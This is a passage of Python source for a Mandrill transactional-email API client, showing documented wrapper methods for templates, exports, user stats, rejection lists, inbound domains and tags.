(string): the date and time the template was last modified as a UTC string in YYYY-MM-DD HH:MM:SS format Raises: UnknownTemplateError: The requested template does not exist InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'name': name} return self.master.call('templates/publish', _params) def delete(self, name): """Delete a template Args: name (string): the immutable name of an existing template Returns: struct. the template that was deleted:: slug (string): the immutable unique code name of the template name (string): the name of the template labels (array): the list of labels applied to the template:: labels[] (string): a single label code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements - draft version subject (string): the subject line of the template, if provided - draft version from_email (string): the default sender address for the template, if provided - draft version from_name (string): the default sender from name for the template, if provided - draft version text (string): the default text part of messages sent with the template, if provided - draft version publish_name (string): the same as the template name - kept as a separate field for backwards compatibility publish_code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements that are available as published, if it has been published publish_subject (string): the subject line of the template, if provided publish_from_email (string): the default sender address for the template, if provided publish_from_name (string): the default sender from name for the template, if provided publish_text (string): the default text part of messages sent with the template, if provided published_at (string): the date and time the template was last published as a UTC string in YYYY-MM-DD HH:MM:SS format, or null if it has not been published 
created_at (string): the date and time the template was first created as a UTC string in YYYY-MM-DD HH:MM:SS format updated_at (string): the date and time the template was last modified as a UTC string in YYYY-MM-DD HH:MM:SS format Raises: UnknownTemplateError: The requested template does not exist InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'name': name} return self.master.call('templates/delete', _params) def list(self, label=None): """Return a list of all the templates available to this user Args: label (string): an optional label to filter the templates Returns: array. an array of structs with information about each template:: [] (struct): the information on each template in the account:: [].slug (string): the immutable unique code name of the template [].name (string): the name of the template [].labels (array): the list of labels applied to the template:: [].labels[] (string): a single label [].code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements - draft version [].subject (string): the subject line of the template, if provided - draft version [].from_email (string): the default sender address for the template, if provided - draft version [].from_name (string): the default sender from name for the template, if provided - draft version [].text (string): the default text part of messages sent with the template, if provided - draft version [].publish_name (string): the same as the template name - kept as a separate field for backwards compatibility [].publish_code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements that are available as published, if it has been published [].publish_subject (string): the subject line of the template, if provided [].publish_from_email (string): the default sender address for the template, if provided [].publish_from_name (string): the default 
sender from name for the template, if provided [].publish_text (string): the default text part of messages sent with the template, if provided [].published_at (string): the date and time the template was last published as a UTC string in YYYY-MM-DD HH:MM:SS format, or null if it has not been published [].created_at (string): the date and time the template was first created as a UTC string in YYYY-MM-DD HH:MM:SS format [].updated_at (string): the date and time the template was last modified as a UTC string in YYYY-MM-DD HH:MM:SS format Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'label': label} return self.master.call('templates/list', _params) def time_series(self, name): """Return the recent history (hourly stats for the last 30 days) for a template Args: name (string): the name of an existing template Returns: array. the array of history information:: [] (struct): the stats for a single hour:: [].time (string): the hour as a UTC date string in YYYY-MM-DD HH:MM:SS format [].sent (integer): the number of emails that were sent during the hour [].hard_bounces (integer): the number of emails that hard bounced during the hour [].soft_bounces (integer): the number of emails that soft bounced during the hour [].rejects (integer): the number of emails that were rejected during the hour [].complaints (integer): the number of spam complaints received during the hour [].opens (integer): the number of emails opened during the hour [].unique_opens (integer): the number of unique opens generated by messages sent during the hour [].clicks (integer): the number of tracked URLs clicked during the hour [].unique_clicks (integer): the number of unique clicks generated by messages sent during the hour Raises: UnknownTemplateError: The requested template does not exist InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ 
_params = {'name': name} return self.master.call('templates/time-series', _params) def render(self, template_name, template_content, merge_vars=None): """Inject content and optionally merge fields into a template, returning the HTML that results Args: template_name (string): the immutable name of a template that exists in the user's account template_content (array): an array of template content to render. Each item in the array should be a struct with two keys - name: the name of the content block to set the content for, and content: the actual content to put into the block:: template_content[] (struct): the injection of a single piece of content into a single editable region:: template_content[].name (string): the name of the mc:edit editable region to inject into template_content[].content (string): the content to inject merge_vars (array): optional merge variables to use for injecting merge field content. If this is not provided, no merge fields will be replaced.:: merge_vars[] (struct): a single merge variable:: merge_vars[].name (string): the merge variable's name. Merge variable names are case-insensitive and may not start with _ merge_vars[].content (string): the merge variable's content Returns: struct. the result of rendering the given template with the content and merge field values injected:: html (string): the rendered HTML as a string Raises: UnknownTemplateError: The requested template does not exist InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'template_name': template_name, 'template_content': template_content, 'merge_vars': merge_vars} return self.master.call('templates/render', _params) class Exports(object): def __init__(self, master): self.master = master def info(self, id): """Returns information about an export job. If the export job's state is 'complete', the returned data will include a URL you can use to fetch the results. 
Every export job produces a zip archive, but the format of the archive is distinct for each job type. The api calls that initiate exports include more details about the output format for that job type. Args: id (string): an export job identifier Returns: struct. the information about the export:: id (string): the unique identifier for this Export. Use this identifier when checking the export job's status created_at (string): the date and time that the export job was created as a UTC string in YYYY-MM-DD HH:MM:SS format type (string): the type of the export job - activity, reject, or whitelist finished_at (string): the date and time that the export job was finished as a UTC string in YYYY-MM-DD HH:MM:SS format state (string): the export job's state - waiting, working, complete, error, or expired. result_url (string): the url for the export job's results, if the job is completed. Raises: UnknownExportError: The requested export job does not exist InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'id': id} return self.master.call('exports/info', _params) def list(self, ): """Returns a list of your exports. Returns: array. the account's exports:: [] (struct): the individual export info:: [].id (string): the unique identifier for this Export. Use this identifier when checking the export job's status [].created_at (string): the date and time that the export job was created as a UTC string in YYYY-MM-DD HH:MM:SS format [].type (string): the type of the export job - activity, reject, or whitelist [].finished_at (string): the date and time that the export job was finished as a UTC string in YYYY-MM-DD HH:MM:SS format [].state (string): the export job's state - waiting, working, complete, error, or expired. [].result_url (string): the url for the export job's results, if the job is completed. 
Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {} return self.master.call('exports/list', _params) def rejects(self, notify_email=None): """Begins an export of your rejection blacklist. The blacklist will be exported to a zip archive containing a single file named rejects.csv that includes the following fields: email, reason, detail, created_at, expires_at, last_event_at, expires_at. Args: notify_email (string): an optional email address to notify when the export job has finished. Returns: struct. information about the rejects export job that was started:: id (string): the unique identifier for this Export. Use this identifier when checking the export job's status created_at (string): the date and time that the export job was created as a UTC string in YYYY-MM-DD HH:MM:SS format type (string): the type of the export job finished_at (string): the date and time that the export job was finished as a UTC string in YYYY-MM-DD HH:MM:SS format, or null for jobs that have not run state (string): the export job's state result_url (string): the url for the export job's results, if the job is complete Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'notify_email': notify_email} return self.master.call('exports/rejects', _params) def whitelist(self, notify_email=None): """Begins an export of your rejection whitelist. The whitelist will be exported to a zip archive containing a single file named whitelist.csv that includes the following fields: email, detail, created_at. Args: notify_email (string): an optional email address to notify when the export job has finished. Returns: struct. information about the whitelist export job that was started:: id (string): the unique identifier for this Export. 
Use this identifier when checking the export job's status created_at (string): the date and time that the export job was created as a UTC string in YYYY-MM-DD HH:MM:SS format type (string): the type of the export job finished_at (string): the date and time that the export job was finished as a UTC string in YYYY-MM-DD HH:MM:SS format, or null for jobs that have not run state (string): the export job's state result_url (string): the url for the export job's results, if the job is complete Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'notify_email': notify_email} return self.master.call('exports/whitelist', _params) def activity(self, notify_email=None, date_from=None, date_to=None, tags=None, senders=None, states=None, api_keys=None): """Begins an export of your activity history. The activity will be exported to a zip archive containing a single file named activity.csv in the same format as you would be able to export from your account's activity view. It includes the following fields: Date, Email Address, Sender, Subject, Status, Tags, Opens, Clicks, Bounce Detail. If you have configured any custom metadata fields, they will be included in the exported data. 
Args: notify_email (string): an optional email address to notify when the export job has finished date_from (string): start date as a UTC string in YYYY-MM-DD HH:MM:SS format date_to (string): end date as a UTC string in YYYY-MM-DD HH:MM:SS format tags (array): an array of tag names to narrow the export to; will match messages that contain ANY of the tags:: tags[] (string): a tag name senders (array): an array of senders to narrow the export to:: senders[] (string): a sender address states (array): an array of states to narrow the export to; messages with ANY of the states will be included:: states[] (string): a message state api_keys (array): an array of api keys to narrow the export to; messsagse sent with ANY of the keys will be included:: api_keys[] (string): an API key associated with your account Returns: struct. information about the activity export job that was started:: id (string): the unique identifier for this Export. Use this identifier when checking the export job's status created_at (string): the date and time that the export job was created as a UTC string in YYYY-MM-DD HH:MM:SS format type (string): the type of the export job finished_at (string): the date and time that the export job was finished as a UTC string in YYYY-MM-DD HH:MM:SS format, or null for jobs that have not run state (string): the export job's state result_url (string): the url for the export job's results, if the job is complete Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'notify_email': notify_email, 'date_from': date_from, 'date_to': date_to, 'tags': tags, 'senders': senders, 'states': states, 'api_keys': api_keys} return self.master.call('exports/activity', _params) class Users(object): def __init__(self, master): self.master = master def info(self, ): """Return the information about the API-connected user Returns: struct. 
the user information including username, key, reputation, quota, and historical sending stats:: username (string): the username of the user (used for SMTP authentication) created_at (string): the date and time that the user's Mandrill account was created as a UTC string in YYYY-MM-DD HH:MM:SS format public_id (string): a unique, permanent identifier for this user reputation (integer): the reputation of the user on a scale from 0 to 100, with 75 generally being a "good" reputation hourly_quota (integer): the maximum number of emails Mandrill will deliver for this user each hour. Any emails beyond that will be accepted and queued for later delivery. Users with higher reputations will have higher hourly quotas backlog (integer): the number of emails that are queued for delivery due to exceeding your monthly or hourly quotas stats (struct): an aggregate summary of the account's sending stats:: stats.today (struct): stats for this user so far today:: stats.today.sent (integer): the number of emails sent for this user so far today stats.today.hard_bounces (integer): the number of emails hard bounced for this user so far today stats.today.soft_bounces (integer): the number of emails soft bounced for this user so far today stats.today.rejects (integer): the number of emails rejected for sending this user so far today stats.today.complaints (integer): the number of spam complaints for this user so far today stats.today.unsubs (integer): the number of unsubscribes for this user so far today stats.today.opens (integer): the number of times emails have been opened for this user so far today stats.today.unique_opens (integer): the number of unique opens for emails sent for this user so far today stats.today.clicks (integer): the number of URLs that have been clicked for this user so far today stats.today.unique_clicks (integer): the number of unique clicks for emails sent for this user so far today stats.last_7_days (struct): stats for this user in the last 7 days:: 
stats.last_7_days.sent (integer): the number of emails sent for this user in the last 7 days stats.last_7_days.hard_bounces (integer): the number of emails hard bounced for this user in the last 7 days stats.last_7_days.soft_bounces (integer): the number of emails soft bounced for this user in the last 7 days stats.last_7_days.rejects (integer): the number of emails rejected for sending this user in the last 7 days stats.last_7_days.complaints (integer): the number of spam complaints for this user in the last 7 days stats.last_7_days.unsubs (integer): the number of unsubscribes for this user in the last 7 days stats.last_7_days.opens (integer): the number of times emails have been opened for this user in the last 7 days stats.last_7_days.unique_opens (integer): the number of unique opens for emails sent for this user in the last 7 days stats.last_7_days.clicks (integer): the number of URLs that have been clicked for this user in the last 7 days stats.last_7_days.unique_clicks (integer): the number of unique clicks for emails sent for this user in the last 7 days stats.last_30_days (struct): stats for this user in the last 30 days:: stats.last_30_days.sent (integer): the number of emails sent for this user in the last 30 days stats.last_30_days.hard_bounces (integer): the number of emails hard bounced for this user in the last 30 days stats.last_30_days.soft_bounces (integer): the number of emails soft bounced for this user in the last 30 days stats.last_30_days.rejects (integer): the number of emails rejected for sending this user in the last 30 days stats.last_30_days.complaints (integer): the number of spam complaints for this user in the last 30 days stats.last_30_days.unsubs (integer): the number of unsubscribes for this user in the last 30 days stats.last_30_days.opens (integer): the number of times emails have been opened for this user in the last 30 days stats.last_30_days.unique_opens (integer): the number of unique opens for emails sent for this user in 
the last 30 days stats.last_30_days.clicks (integer): the number of URLs that have been clicked for this user in the last 30 days stats.last_30_days.unique_clicks (integer): the number of unique clicks for emails sent for this user in the last 30 days stats.last_60_days (struct): stats for this user in the last 60 days:: stats.last_60_days.sent (integer): the number of emails sent for this user in the last 60 days stats.last_60_days.hard_bounces (integer): the number of emails hard bounced for this user in the last 60 days stats.last_60_days.soft_bounces (integer): the number of emails soft bounced for this user in the last 60 days stats.last_60_days.rejects (integer): the number of emails rejected for sending this user in the last 60 days stats.last_60_days.complaints (integer): the number of spam complaints for this user in the last 60 days stats.last_60_days.unsubs (integer): the number of unsubscribes for this user in the last 60 days stats.last_60_days.opens (integer): the number of times emails have been opened for this user in the last 60 days stats.last_60_days.unique_opens (integer): the number of unique opens for emails sent for this user in the last 60 days stats.last_60_days.clicks (integer): the number of URLs that have been clicked for this user in the last 60 days stats.last_60_days.unique_clicks (integer): the number of unique clicks for emails sent for this user in the last 60 days stats.last_90_days (struct): stats for this user in the last 90 days:: stats.last_90_days.sent (integer): the number of emails sent for this user in the last 90 days stats.last_90_days.hard_bounces (integer): the number of emails hard bounced for this user in the last 90 days stats.last_90_days.soft_bounces (integer): the number of emails soft bounced for this user in the last 90 days stats.last_90_days.rejects (integer): the number of emails rejected for sending this user in the last 90 days stats.last_90_days.complaints (integer): the number of spam complaints for this 
user in the last 90 days stats.last_90_days.unsubs (integer): the number of unsubscribes for this user in the last 90 days stats.last_90_days.opens (integer): the number of times emails have been opened for this user in the last 90 days stats.last_90_days.unique_opens (integer): the number of unique opens for emails sent for this user in the last 90 days stats.last_90_days.clicks (integer): the number of URLs that have been clicked for this user in the last 90 days stats.last_90_days.unique_clicks (integer): the number of unique clicks for emails sent for this user in the last 90 days stats.all_time (struct): stats for the lifetime of the user's account:: stats.all_time.sent (integer): the number of emails sent in the lifetime of the user's account stats.all_time.hard_bounces (integer): the number of emails hard bounced in the lifetime of the user's account stats.all_time.soft_bounces (integer): the number of emails soft bounced in the lifetime of the user's account stats.all_time.rejects (integer): the number of emails rejected for sending this user so far today stats.all_time.complaints (integer): the number of spam complaints in the lifetime of the user's account stats.all_time.unsubs (integer): the number of unsubscribes in the lifetime of the user's account stats.all_time.opens (integer): the number of times emails have been opened in the lifetime of the user's account stats.all_time.unique_opens (integer): the number of unique opens for emails sent in the lifetime of the user's account stats.all_time.clicks (integer): the number of URLs that have been clicked in the lifetime of the user's account stats.all_time.unique_clicks (integer): the number of unique clicks for emails sent in the lifetime of the user's account Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {} return self.master.call('users/info', _params) def ping(self, ): """Validate an API key and respond to a 
ping Returns: string. the string "PONG!" Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {} return self.master.call('users/ping', _params) def ping2(self, ): """Validate an API key and respond to a ping (anal JSON parser version) Returns: struct. a struct with one key "PING" with a static value "PONG!" Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {} return self.master.call('users/ping2', _params) def senders(self, ): """Return the senders that have tried to use this account, both verified and unverified Returns: array. an array of sender data, one for each sending addresses used by the account:: [] (struct): the information on each sending address in the account:: [].address (string): the sender's email address [].created_at (string): the date and time that the sender was first seen by Mandrill as a UTC date string in YYYY-MM-DD HH:MM:SS format [].sent (integer): the total number of messages sent by this sender [].hard_bounces (integer): the total number of hard bounces by messages by this sender [].soft_bounces (integer): the total number of soft bounces by messages by this sender [].rejects (integer): the total number of rejected messages by this sender [].complaints (integer): the total number of spam complaints received for messages by this sender [].unsubs (integer): the total number of unsubscribe requests received for messages by this sender [].opens (integer): the total number of times messages by this sender have been opened [].clicks (integer): the total number of times tracked URLs in messages by this sender have been clicked [].unique_opens (integer): the number of unique opens for emails sent for this sender [].unique_clicks (integer): the number of unique clicks for emails sent for this sender Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key 
Error: A general Mandrill error has occurred """ _params = {} return self.master.call('users/senders', _params) class Rejects(object): def __init__(self, master): self.master = master def add(self, email, comment=None, subaccount=None): """Adds an email to your email rejection blacklist. Addresses that you add manually will never expire and there is no reputation penalty for removing them from your blacklist. Attempting to blacklist an address that has been whitelisted will have no effect. Args: email (string): an email address to block comment (string): an optional comment describing the rejection subaccount (string): an optional unique identifier for the subaccount to limit the blacklist entry Returns: struct. a status object containing the address and the result of the operation:: email (string): the email address you provided added (boolean): whether the operation succeeded Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownSubaccountError: The provided subaccount id does not exist. Error: A general Mandrill error has occurred """ _params = {'email': email, 'comment': comment, 'subaccount': subaccount} return self.master.call('rejects/add', _params) def list(self, email=None, include_expired=False, subaccount=None): """Retrieves your email rejection blacklist. You can provide an email address to limit the results. Returns up to 1000 results. By default, entries that have expired are excluded from the results; set include_expired to true to include them. Args: email (string): an optional email address to search by include_expired (boolean): whether to include rejections that have already expired. subaccount (string): an optional unique identifier for the subaccount to limit the blacklist Returns: array. 
Up to 1000 rejection entries:: [] (struct): the information for each rejection blacklist entry:: [].email (string): the email that is blocked [].reason (string): the type of event (hard-bounce, soft-bounce, spam, unsub) that caused this rejection [].detail (string): extended details about the event, such as the SMTP diagnostic for bounces or the comment for manually-created rejections [].created_at (string): when the email was added to the blacklist [].last_event_at (string): the timestamp of the most recent event that either created or renewed this rejection [].expires_at (string): when the blacklist entry will expire (this may be in the past) [].expired (boolean): whether the blacklist entry has expired [].sender (struct): the sender that this blacklist entry applies to, or null if none.:: [].sender.address (string): the sender's email address [].sender.created_at (string): the date and time that the sender was first seen by Mandrill as a UTC date string in YYYY-MM-DD HH:MM:SS format [].sender.sent (integer): the total number of messages sent by this sender [].sender.hard_bounces (integer): the total number of hard bounces by messages by this sender [].sender.soft_bounces (integer): the total number of soft bounces by messages by this sender [].sender.rejects (integer): the total number of rejected messages by this sender [].sender.complaints (integer): the total number of spam complaints received for messages by this sender [].sender.unsubs (integer): the total number of unsubscribe requests received for messages by this sender [].sender.opens (integer): the total number of times messages by this sender have been opened [].sender.clicks (integer): the total number of times tracked URLs in messages by this sender have been clicked [].sender.unique_opens (integer): the number of unique opens for emails sent for this sender [].sender.unique_clicks (integer): the number of unique clicks for emails sent for this sender [].subaccount (string): the subaccount that this 
blacklist entry applies to, or null if none. Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownSubaccountError: The provided subaccount id does not exist. Error: A general Mandrill error has occurred """ _params = {'email': email, 'include_expired': include_expired, 'subaccount': subaccount} return self.master.call('rejects/list', _params) def delete(self, email, subaccount=None): """Deletes an email rejection. There is no limit to how many rejections you can remove from your blacklist, but keep in mind that each deletion has an affect on your reputation. Args: email (string): an email address subaccount (string): an optional unique identifier for the subaccount to limit the blacklist deletion Returns: struct. a status object containing the address and whether the deletion succeeded.:: email (string): the email address that was removed from the blacklist deleted (boolean): whether the address was deleted successfully. subaccount (string): the subaccount blacklist that the address was removed from, if any Raises: InvalidRejectError: The requested email is not in the rejection list InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownSubaccountError: The provided subaccount id does not exist. Error: A general Mandrill error has occurred """ _params = {'email': email, 'subaccount': subaccount} return self.master.call('rejects/delete', _params) class Inbound(object): def __init__(self, master): self.master = master def domains(self, ): """List the domains that have been configured for inbound delivery Returns: array. 
the inbound domains associated with the account:: [] (struct): the individual domain info:: [].domain (string): the domain name that is accepting mail [].created_at (string): the date and time that the inbound domain was added as a UTC string in YYYY-MM-DD HH:MM:SS format [].valid_mx (boolean): true if this inbound domain has successfully set up an MX record to deliver mail to the Mandrill servers Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {} return self.master.call('inbound/domains', _params) def add_domain(self, domain): """Add an inbound domain to your account Args: domain (string): a domain name Returns: struct. information about the domain:: domain (string): the domain name that is accepting mail created_at (string): the date and time that the inbound domain was added as a UTC string in YYYY-MM-DD HH:MM:SS format valid_mx (boolean): true if this inbound domain has successfully set up an MX record to deliver mail to the Mandrill servers Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'domain': domain} return self.master.call('inbound/add-domain', _params) def check_domain(self, domain): """Check the MX settings for an inbound domain. The domain must have already been added with the add-domain call Args: domain (string): an existing inbound domain Returns: struct. 
information about the inbound domain:: domain (string): the domain name that is accepting mail created_at (string): the date and time that the inbound domain was added as a UTC string in YYYY-MM-DD HH:MM:SS format valid_mx (boolean): true if this inbound domain has successfully set up an MX record to deliver mail to the Mandrill servers Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownInboundDomainError: The requested inbound domain does not exist Error: A general Mandrill error has occurred """ _params = {'domain': domain} return self.master.call('inbound/check-domain', _params) def delete_domain(self, domain): """Delete an inbound domain from the account. All mail will stop routing for this domain immediately. Args: domain (string): an existing inbound domain Returns: struct. information about the deleted domain:: domain (string): the domain name that is accepting mail created_at (string): the date and time that the inbound domain was added as a UTC string in YYYY-MM-DD HH:MM:SS format valid_mx (boolean): true if this inbound domain has successfully set up an MX record to deliver mail to the Mandrill servers Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownInboundDomainError: The requested inbound domain does not exist Error: A general Mandrill error has occurred """ _params = {'domain': domain} return self.master.call('inbound/delete-domain', _params) def routes(self, domain): """List the mailbox routes defined for an inbound domain Args: domain (string): the domain to check Returns: array. 
the routes associated with the domain:: [] (struct): the individual mailbox route:: [].id (string): the unique identifier of the route [].pattern (string): the search pattern that the mailbox name should match [].url (string): the webhook URL where inbound messages will be published Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownInboundDomainError: The requested inbound domain does not exist Error: A general Mandrill error has occurred """ _params = {'domain': domain} return self.master.call('inbound/routes', _params) def add_route(self, domain, pattern, url): """Add a new mailbox route to an inbound domain Args: domain (string): an existing inbound domain pattern (string): the search pattern that the mailbox name should match url (string): the webhook URL where the inbound messages will be published Returns: struct. the added mailbox route information:: id (string): the unique identifier of the route pattern (string): the search pattern that the mailbox name should match url (string): the webhook URL where inbound messages will be published Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownInboundDomainError: The requested inbound domain does not exist Error: A general Mandrill error has occurred """ _params = {'domain': domain, 'pattern': pattern, 'url': url} return self.master.call('inbound/add-route', _params) def update_route(self, id, pattern=None, url=None): """Update the pattern or webhook of an existing inbound mailbox route. If null is provided for any fields, the values will remain unchanged. Args: id (string): the unique identifier of an existing mailbox route pattern (string): the search pattern that the mailbox name should match url (string): the webhook URL where the inbound messages will be published Returns: struct. 
the updated mailbox route information:: id (string): the unique identifier of the route pattern (string): the search pattern that the mailbox name should match url (string): the webhook URL where inbound messages will be published Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownInboundRouteError: The provided inbound route does not exist. Error: A general Mandrill error has occurred """ _params = {'id': id, 'pattern': pattern, 'url': url} return self.master.call('inbound/update-route', _params) def delete_route(self, id): """Delete an existing inbound mailbox route Args: id (string): the unique identifier of an existing route Returns: struct. the deleted mailbox route information:: id (string): the unique identifier of the route pattern (string): the search pattern that the mailbox name should match url (string): the webhook URL where inbound messages will be published Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownInboundRouteError: The provided inbound route does not exist. Error: A general Mandrill error has occurred """ _params = {'id': id} return self.master.call('inbound/delete-route', _params) def send_raw(self, raw_message, to=None, mail_from=None, helo=None, client_address=None): """Take a raw MIME document destined for a domain with inbound domains set up, and send it to the inbound hook exactly as if it had been sent over SMTP Args: raw_message (string): the full MIME document of an email message to (array|null): optionally define the recipients to receive the message - otherwise we'll use the To, Cc, and Bcc headers provided in the document:: to[] (string): the email address of the recipient mail_from (string): the address specified in the MAIL FROM stage of the SMTP conversation. Required for the SPF check. helo (string): the identification provided by the client mta in the MTA state of the SMTP conversation. Required for the SPF check. 
client_address (string): the remote MTA's ip address. Optional; required for the SPF check. Returns: array. an array of the information for each recipient in the message (usually one) that matched an inbound route:: [] (struct): the individual recipient information:: [].email (string): the email address of the matching recipient [].pattern (string): the mailbox route pattern that the recipient matched [].url (string): the webhook URL that the message was posted to Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'raw_message': raw_message, 'to': to, 'mail_from': mail_from, 'helo': helo, 'client_address': client_address} return self.master.call('inbound/send-raw', _params) class Tags(object): def __init__(self, master): self.master = master def list(self, ): """Return all of the user-defined tag information Returns: array. a list of user-defined tags:: [] (struct): a user-defined tag:: [].tag (string): the actual tag as a string [].reputation (integer): the tag's current reputation on a scale from 0 to 100. 
[].sent (integer): the total number of messages sent with this tag [].hard_bounces (integer): the total number of hard bounces by messages with this tag [].soft_bounces (integer): the total number of soft bounces by messages with this tag [].rejects (integer): the total number of rejected messages with this tag [].complaints (integer): the total number of spam complaints received for messages with this tag [].unsubs (integer): the total number of unsubscribe requests received for messages with this tag [].opens (integer): the total number of times messages with this tag have been opened [].clicks (integer): the total number of times tracked URLs in messages with this tag have been clicked [].unique_opens (integer): the number of unique opens for emails sent with this tag [].unique_clicks (integer): the number of unique clicks for emails sent with this tag Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {} return self.master.call('tags/list', _params) def delete(self, tag): """Deletes a tag permanently. Deleting a tag removes the tag from any messages that have been sent, and also deletes the tag's stats. There is no way to undo this operation, so use it carefully. Args: tag (string): a tag name Returns: struct. the tag that was deleted:: tag (string): the actual tag as a string reputation (integer): the tag's current reputation on a scale from 0 to 100. 
sent (integer): the total number of messages sent with this tag hard_bounces (integer): the total number of hard bounces by messages with this tag soft_bounces (integer): the total number of soft bounces by messages with this tag rejects (integer): the total number of rejected messages with this tag complaints (integer): the total number of spam complaints received for messages with this tag unsubs (integer): the total number of unsubscribe requests received for messages with this tag opens (integer): the total number of times messages with this tag have been opened clicks (integer): the total number of times tracked URLs in messages with this tag have been clicked unique_opens (integer): the number of unique opens for emails sent with this tag unique_clicks (integer): the number of unique clicks for emails sent with this tag Raises: InvalidTagNameError: The requested tag does not exist or contains invalid characters InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'tag': tag} return self.master.call('tags/delete', _params) def info(self, tag): """Return more detailed information about a single tag, including aggregates of recent stats Args: tag (string): an existing tag name Returns: struct. 
the detailed information on the tag:: tag (string): the actual tag as a string sent (integer): the total number of messages sent with this tag hard_bounces (integer): the total number of hard bounces by messages with this tag soft_bounces (integer): the total number of soft bounces by messages with this tag rejects (integer): the total number of rejected messages with this tag complaints (integer): the total number of spam complaints received for messages with this tag unsubs (integer): the total number of unsubscribe requests received for messages with this tag opens (integer): the total number of times messages with this tag have been opened clicks (integer): the total number of times tracked URLs in messages with this tag have been clicked stats (struct): an aggregate summary of the tag's sending stats:: stats.today (struct): stats with this tag so far today:: stats.today.sent (integer): the number of emails sent with this tag so far today stats.today.hard_bounces (integer): the number of emails hard bounced with this tag so far today stats.today.soft_bounces (integer): the number of emails soft bounced with this tag so far today stats.today.rejects (integer): the number of emails rejected for sending this tag so far today stats.today.complaints (integer): the number of spam complaints with this tag so far today stats.today.unsubs (integer): the number of unsubscribes with this tag so far today stats.today.opens (integer): the number of times emails have been opened with this tag so far today stats.today.unique_opens (integer): the number of unique opens for emails sent with this tag so far today stats.today.clicks (integer): the number of URLs that have been clicked with this tag so far today stats.today.unique_clicks (integer): the number of unique clicks for emails sent with this tag so far today stats.last_7_days (struct): stats with this tag in the last 7 days:: stats.last_7_days.sent (integer): the number of emails sent with this tag in the last 7 days 
stats.last_7_days.hard_bounces (integer): the number of emails hard bounced with this tag in the last 7 days stats.last_7_days.soft_bounces (integer): the number of emails soft bounced with this tag in the last 7 days stats.last_7_days.rejects (integer): the number of emails rejected for sending this tag in the last 7 days stats.last_7_days.complaints (integer): the number of spam complaints with this tag in the last 7 days stats.last_7_days.unsubs (integer): the number of unsubscribes with this tag in the last 7 days stats.last_7_days.opens (integer): the number of times emails have been opened with this tag in the last 7 days stats.last_7_days.unique_opens (integer): the number of unique opens for emails sent with this tag in the last 7 days stats.last_7_days.clicks (integer): the number of URLs that have been clicked with this tag in the last 7 days stats.last_7_days.unique_clicks (integer): the number of unique clicks for emails sent with this tag in the last 7 days stats.last_30_days (struct): stats with this tag in the last 30 days:: stats.last_30_days.sent (integer): the number of emails sent with this tag in the last 30 days stats.last_30_days.hard_bounces (integer): the number of emails hard bounced with this tag in the last 30 days stats.last_30_days.soft_bounces (integer): the number of emails soft bounced with this tag in the last 30 days stats.last_30_days.rejects (integer): the number of emails rejected for sending this tag in the last 30 days stats.last_30_days.complaints (integer): the number of spam complaints with this tag in the last 30 days stats.last_30_days.unsubs (integer): the number of unsubscribes with this tag in the last 30 days stats.last_30_days.opens (integer): the number of times emails have been opened with this tag in the last 30 days stats.last_30_days.unique_opens (integer): the number of unique opens for emails sent with this tag in the last 30 days stats.last_30_days.clicks (integer): the number of URLs that have been clicked 
with this tag in the last 30 days stats.last_30_days.unique_clicks (integer): the number of unique clicks for emails sent with this tag in the last 30 days stats.last_60_days (struct): stats with this tag in the last 60 days:: stats.last_60_days.sent (integer): the number of emails sent with this tag in the last 60 days stats.last_60_days.hard_bounces (integer): the number of emails hard bounced with this tag in the last 60 days stats.last_60_days.soft_bounces (integer): the number of emails soft bounced with this tag in the last 60 days stats.last_60_days.rejects (integer): the number of emails rejected for sending this tag in the last 60 days stats.last_60_days.complaints (integer): the number of spam complaints with this tag in the last 60 days stats.last_60_days.unsubs (integer): the number of unsubscribes with this tag in the last 60 days stats.last_60_days.opens (integer): the number of times emails have been opened with this tag in the last 60 days stats.last_60_days.unique_opens (integer): the number of unique opens for emails sent with this tag in the last 60 days stats.last_60_days.clicks (integer): the number of URLs that have been clicked with this tag in the last 60 days stats.last_60_days.unique_clicks (integer): the number of unique clicks for emails sent with this tag in the last 60 days stats.last_90_days (struct): stats with this tag in the last 90 days:: stats.last_90_days.sent (integer): the number of emails sent with this tag in the last 90 days stats.last_90_days.hard_bounces (integer): the number of emails hard bounced 